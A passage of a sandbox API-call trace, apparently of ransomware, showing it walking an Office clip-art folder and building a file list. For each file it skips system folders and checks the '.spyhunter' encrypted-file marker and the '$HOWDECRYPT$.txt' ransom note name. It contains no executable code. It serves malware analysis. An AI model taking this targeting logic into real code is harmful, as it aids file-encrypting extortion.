(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 67 [0097.219] GetProcessHeap () returned 0x2c0000 [0097.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f958 [0097.219] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ba8) returned 0x2c310e0 [0097.220] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.220] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="Windows") returned -1 [0097.220] lstrlenW (lpString="Windows") returned 7 [0097.220] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="$Recycle.bin") returned 1 [0097.220] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.220] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="System Volume Information") returned -1 [0097.220] lstrlenW (lpString="System Volume Information") returned 25 [0097.220] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 67 [0097.220] StrStrIW (lpFirst="DD01182_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.220] lstrcmpW (lpString1="DD01182_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.220] lstrcmpW (lpString1="DD01182_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.220] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 67 [0097.220] GetProcessHeap () returned 0x2c0000 [0097.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2fa28 [0097.220] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1bb0) returned 0x2c310e0 [0097.220] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.220] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="Windows") returned -1 [0097.220] lstrlenW (lpString="Windows") returned 7 [0097.220] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="$Recycle.bin") returned 1 [0097.220] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.220] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="System Volume Information") returned -1 [0097.220] lstrlenW (lpString="System Volume Information") returned 25 [0097.220] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 67 [0097.220] StrStrIW (lpFirst="DD01183_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.220] lstrcmpW (lpString1="DD01183_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.220] lstrcmpW (lpString1="DD01183_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.220] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 67 [0097.220] GetProcessHeap () returned 0x2c0000 [0097.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2faf8 [0097.221] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1bb8) returned 0x2c310e0 [0097.221] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.221] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="Windows") returned -1 [0097.221] lstrlenW (lpString="Windows") returned 7 [0097.221] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="$Recycle.bin") returned 1 [0097.221] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.221] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="System Volume Information") returned -1 [0097.221] lstrlenW (lpString="System Volume Information") returned 25 [0097.221] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 67 [0097.221] StrStrIW (lpFirst="DD01186_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.221] lstrcmpW (lpString1="DD01186_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.221] lstrcmpW (lpString1="DD01186_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.221] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 67 [0097.221] GetProcessHeap () returned 0x2c0000 [0097.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2fbc8 [0097.221] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1bc0) returned 0x2c310e0 [0097.221] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.221] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="Windows") returned -1 [0097.221] lstrlenW (lpString="Windows") returned 7 [0097.221] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="$Recycle.bin") returned 1 [0097.221] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.221] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="System Volume Information") returned -1 [0097.221] lstrlenW (lpString="System Volume Information") returned 25 [0097.221] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 67 [0097.221] StrStrIW (lpFirst="DD01366_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.221] lstrcmpW (lpString1="DD01366_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.222] lstrcmpW (lpString1="DD01366_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.222] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 67 [0097.222] GetProcessHeap () returned 0x2c0000 [0097.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2fc98 [0097.222] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1bc8) returned 0x2c310e0 [0097.222] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.222] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="Windows") returned -1 [0097.222] lstrlenW (lpString="Windows") returned 7 [0097.222] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="$Recycle.bin") returned 1 [0097.222] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.222] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="System Volume Information") returned -1 [0097.222] lstrlenW (lpString="System Volume Information") returned 25 [0097.222] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 67 [0097.222] StrStrIW (lpFirst="DD01434_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.222] lstrcmpW (lpString1="DD01434_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.222] lstrcmpW (lpString1="DD01434_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.222] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 67 [0097.222] GetProcessHeap () returned 0x2c0000 [0097.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2fd68 [0097.222] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1bd0) returned 0x2c310e0 [0097.222] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.222] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="Windows") returned -1 [0097.222] lstrlenW (lpString="Windows") returned 7 [0097.222] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="$Recycle.bin") returned 1 [0097.222] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.222] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="System Volume Information") returned -1 [0097.222] lstrlenW (lpString="System Volume Information") returned 25 [0097.222] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 67 [0097.223] StrStrIW (lpFirst="DD01585_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.223] lstrcmpW (lpString1="DD01585_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.223] lstrcmpW (lpString1="DD01585_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.223] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 67 [0097.223] GetProcessHeap () returned 0x2c0000 [0097.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2fe38 [0097.223] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1bd8) returned 0x2c310e0 [0097.223] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.223] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="Windows") returned -1 [0097.223] lstrlenW (lpString="Windows") returned 7 [0097.223] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="$Recycle.bin") returned 1 [0097.223] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.223] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="System Volume Information") returned -1 [0097.223] lstrlenW (lpString="System Volume Information") returned 25 [0097.223] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 67 [0097.223] StrStrIW (lpFirst="DD01586_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.223] lstrcmpW (lpString1="DD01586_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.223] lstrcmpW (lpString1="DD01586_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.223] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 67 [0097.223] GetProcessHeap () returned 0x2c0000 [0097.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ff08 [0097.223] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1be0) returned 0x2c310e0 [0097.223] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.223] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="Windows") returned -1 [0097.223] lstrlenW (lpString="Windows") returned 7 [0097.223] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="$Recycle.bin") returned 1 [0097.223] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.224] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="System Volume Information") returned -1 [0097.224] lstrlenW (lpString="System Volume Information") returned 25 [0097.224] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 67 [0097.224] StrStrIW (lpFirst="DD01628_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.224] lstrcmpW (lpString1="DD01628_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.224] lstrcmpW (lpString1="DD01628_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 67 [0097.224] GetProcessHeap () returned 0x2c0000 [0097.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ffd8 [0097.224] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1be8) returned 0x2c310e0 [0097.224] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.224] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="Windows") returned -1 [0097.224] lstrlenW (lpString="Windows") returned 7 [0097.224] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="$Recycle.bin") returned 1 [0097.224] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.224] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="System Volume Information") returned -1 [0097.224] lstrlenW (lpString="System Volume Information") returned 25 [0097.224] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 67 [0097.224] StrStrIW (lpFirst="DD01629_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.224] lstrcmpW (lpString1="DD01629_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.224] lstrcmpW (lpString1="DD01629_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 67 [0097.224] GetProcessHeap () returned 0x2c0000 [0097.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c300a8 [0097.225] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1bf0) returned 0x2c310e0 [0097.225] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.540] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="Windows") returned -1 [0097.540] lstrlenW (lpString="Windows") returned 7 [0097.540] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="$Recycle.bin") returned 1 [0097.541] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.541] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="System Volume Information") returned -1 [0097.541] lstrlenW (lpString="System Volume Information") returned 25 [0097.541] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 67 [0097.541] StrStrIW (lpFirst="DD01630_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.541] lstrcmpW (lpString1="DD01630_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.541] lstrcmpW (lpString1="DD01630_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.541] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 67 [0097.541] GetProcessHeap () returned 0x2c0000 [0097.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c148a8 [0097.541] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1bf8) returned 0x2c310e0 [0097.541] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.541] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="Windows") returned -1 [0097.541] lstrlenW (lpString="Windows") returned 7 [0097.541] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="$Recycle.bin") returned 1 [0097.541] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.541] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="System Volume Information") returned -1 [0097.541] lstrlenW (lpString="System Volume Information") returned 25 [0097.541] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 67 [0097.541] StrStrIW (lpFirst="DD01631_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.541] lstrcmpW (lpString1="DD01631_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.541] lstrcmpW (lpString1="DD01631_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.541] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 67 [0097.541] GetProcessHeap () returned 0x2c0000 [0097.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c14978 [0097.541] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c00) returned 0x2c310e0 [0097.542] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.542] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="Windows") returned -1 [0097.542] lstrlenW (lpString="Windows") returned 7 [0097.542] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="$Recycle.bin") returned 1 [0097.542] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.542] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="System Volume Information") returned -1 [0097.542] lstrlenW (lpString="System Volume Information") returned 25 [0097.542] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 67 [0097.542] StrStrIW (lpFirst="DD01761_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.542] lstrcmpW (lpString1="DD01761_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.542] lstrcmpW (lpString1="DD01761_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.542] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 67 [0097.542] GetProcessHeap () returned 0x2c0000 [0097.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c14a48 [0097.542] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c08) returned 0x2c310e0 [0097.542] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.542] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="Windows") returned -1 [0097.542] lstrlenW (lpString="Windows") returned 7 [0097.542] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="$Recycle.bin") returned 1 [0097.542] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.542] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="System Volume Information") returned -1 [0097.542] lstrlenW (lpString="System Volume Information") returned 25 [0097.542] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 67 [0097.542] StrStrIW (lpFirst="DD01772_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.542] lstrcmpW (lpString1="DD01772_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.542] lstrcmpW (lpString1="DD01772_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.542] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 67 [0097.543] GetProcessHeap () returned 0x2c0000 [0097.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c14b18 [0097.543] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c10) returned 0x2c310e0 [0097.543] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.543] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="Windows") returned -1 [0097.543] lstrlenW (lpString="Windows") returned 7 [0097.543] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="$Recycle.bin") returned 1 [0097.543] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.543] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="System Volume Information") returned -1 [0097.543] lstrlenW (lpString="System Volume Information") returned 25 [0097.543] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 67 [0097.543] StrStrIW (lpFirst="DD01793_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.543] lstrcmpW (lpString1="DD01793_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.543] lstrcmpW (lpString1="DD01793_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.543] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 67 [0097.543] GetProcessHeap () returned 0x2c0000 [0097.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c14be8 [0097.543] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c18) returned 0x2c310e0 [0097.543] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.543] lstrcmpiW (lpString1="EAST_01.MID", lpString2="Windows") returned -1 [0097.543] lstrlenW (lpString="Windows") returned 7 [0097.543] lstrcmpiW (lpString1="EAST_01.MID", lpString2="$Recycle.bin") returned 1 [0097.544] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.544] lstrcmpiW (lpString1="EAST_01.MID", lpString2="System Volume Information") returned -1 [0097.544] lstrlenW (lpString="System Volume Information") returned 25 [0097.544] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 66 [0097.544] StrStrIW (lpFirst="EAST_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.544] lstrcmpW (lpString1="EAST_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.544] lstrcmpW (lpString1="EAST_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.544] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 66 [0097.544] GetProcessHeap () returned 0x2c0000 [0097.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x2c14cb8 [0097.544] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c20) returned 0x2c310e0 [0097.544] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.544] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="Windows") returned -1 [0097.544] lstrlenW (lpString="Windows") returned 7 [0097.544] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="$Recycle.bin") returned 1 [0097.544] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.544] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="System Volume Information") returned -1 [0097.544] lstrlenW (lpString="System Volume Information") returned 25 [0097.544] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 67 [0097.544] StrStrIW (lpFirst="ED00010_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.544] lstrcmpW (lpString1="ED00010_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.544] lstrcmpW (lpString1="ED00010_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.544] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 67 [0097.544] GetProcessHeap () returned 0x2c0000 [0097.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c14d88 [0097.544] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c28) returned 0x2c310e0 [0097.544] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.545] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="Windows") returned -1 [0097.545] lstrlenW (lpString="Windows") returned 7 [0097.545] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="$Recycle.bin") returned 1 [0097.545] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.545] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="System Volume Information") returned -1 [0097.545] lstrlenW (lpString="System Volume Information") returned 25 [0097.545] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 67 [0097.545] StrStrIW (lpFirst="ED00019_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.545] lstrcmpW (lpString1="ED00019_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.545] lstrcmpW (lpString1="ED00019_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.545] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 67 [0097.545] GetProcessHeap () returned 0x2c0000 [0097.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c14e58 [0097.545] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c30) returned 0x2c310e0 [0097.545] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.545] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="Windows") returned -1 [0097.545] lstrlenW (lpString="Windows") returned 7 [0097.545] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="$Recycle.bin") returned 1 [0097.545] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.545] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="System Volume Information") returned -1 [0097.545] lstrlenW (lpString="System Volume Information") returned 25 [0097.545] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 67 [0097.545] StrStrIW (lpFirst="ED00172_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.545] lstrcmpW (lpString1="ED00172_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.545] lstrcmpW (lpString1="ED00172_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.545] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 67 [0097.545] GetProcessHeap () returned 0x2c0000 [0097.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c14f28 [0097.546] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c38) returned 0x2c310e0 [0097.546] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.546] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="Windows") returned -1 [0097.546] lstrlenW (lpString="Windows") returned 7 [0097.546] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="$Recycle.bin") returned 1 [0097.546] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.546] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="System Volume Information") returned -1 [0097.546] lstrlenW (lpString="System Volume Information") returned 25 [0097.546] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 67 [0097.546] StrStrIW (lpFirst="ED00184_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.546] lstrcmpW (lpString1="ED00184_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.546] lstrcmpW (lpString1="ED00184_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.546] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 67 [0097.546] GetProcessHeap () returned 0x2c0000 [0097.546] RtlAllocateHeap 